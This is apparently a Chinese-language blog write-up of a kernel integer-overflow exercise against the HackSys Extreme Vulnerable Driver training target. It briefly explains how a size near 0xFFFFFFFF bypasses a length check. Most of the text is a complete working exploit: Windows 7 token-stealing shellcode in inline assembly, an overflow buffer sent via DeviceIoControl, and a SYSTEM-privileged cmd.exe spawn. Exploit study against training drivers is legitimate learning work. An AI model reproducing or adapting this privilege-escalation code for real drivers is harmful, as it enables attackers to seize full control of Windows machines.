整数溢出 在 CTF的pwn 里面很常见===

这东西确实 怎么说呢   道理就很浅显===

整数的范围就那么大 如果超过了就可能造成漏洞

先来看一下 HEVD的 源码

可以看到 危险版本 和安全的版本的区别==

其中这个  TerminatorSize 的 赋值的地方

这里就是 4  那么 如果我们的值  0xfffffffc~0xffffffff  就等于了 0 -3 

那么 就绕过了检查==

exp 的话==  就很简单了

然后我这里的ebp 距离和 exp 上面的有所不同 然后 用ida可以看的出来

成功执行shellcode  并且成功拿到权限

这里是绕过的exp

#include<stdio.h>
#include<string.h>
#include<algorithm>
#include<vector>
#include<iostream>
#include<time.h>
#include "windows.h"
using namespace std;
typedef void(*FunctionPointer) ();
VOID shellcode() {
	
	__asm {
		pushad; Save registers state

			; Start of Token Stealing Stub
			xor eax, eax; Set ZERO
			mov eax, fs:[eax + 124h]; Get nt!_KPCR.PcrbData.CurrentThread
			; _KTHREAD is located at FS : [0x124]

			mov eax, [eax + 050h]; Get nt!_KTHREAD.ApcState.Process

			mov ecx, eax; Copy current process _EPROCESS structure

			mov edx, 4; WIN 7 SP1 SYSTEM process PID = 0x4

		SearchSystemPID:
		mov eax, [eax + 0b8h]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
			sub eax, 0b8h
			cmp[eax + 0b4h], edx; Get nt!_EPROCESS.UniqueProcessId
			jne SearchSystemPID

			mov edx, [eax + 0f8h]; Get SYSTEM process nt!_EPROCESS.Token
			mov[ecx + 0f8h], edx; Replace target process nt!_EPROCESS.Token
			; with SYSTEM process nt!_EPROCESS.Token
			; End of Token Stealing Stub

			popad; Restore registers state

			; Kernel Recovery Stub
			xor eax, eax; Set NTSTATUS SUCCEESS
			add esp, 12; Fix the stack
			pop ebp; Restore saved EBP
			ret 8; Return cleanly
	}
	
}

static VOID Cmd()
{
	STARTUPINFO si = { sizeof(si) };
	PROCESS_INFORMATION pi = { 0 };
	si.dwFlags = STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_SHOW;
	WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
	BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
	if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}


int main()
{
	CHAR buffer[0x830];
	HANDLE hDevice=NULL;
	DWORD bReturn = 0;
	__try
	{

		hDevice = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
			GENERIC_READ | GENERIC_WRITE,
			FILE_SHARE_READ | FILE_SHARE_WRITE,
			NULL,
			OPEN_EXISTING,
			FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
			NULL
			);
		if (hDevice == INVALID_HANDLE_VALUE || hDevice == NULL) {
			printf("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
			exit(EXIT_FAILURE);
		}
		memset(buffer, 'A', 0x830);
		*(PDWORD)(buffer + 0x824) = (DWORD)&shellcode;
		*(PDWORD)(buffer + 0x828) = 0xBAD0B0B0;
		DeviceIoControl(hDevice,
			0x222027,
			(LPVOID)buffer,
			(DWORD)0xFFFFFFFF,
			NULL,
			0,
			&bReturn,
			NULL);
		Cmd();

	}
	__except (EXCEPTION_EXECUTE_HANDLER) {
		printf("\t\t[-] Exception: 0x%X\n", GetLastError());
		exit(EXIT_FAILURE);
	}

	
	return 0;
}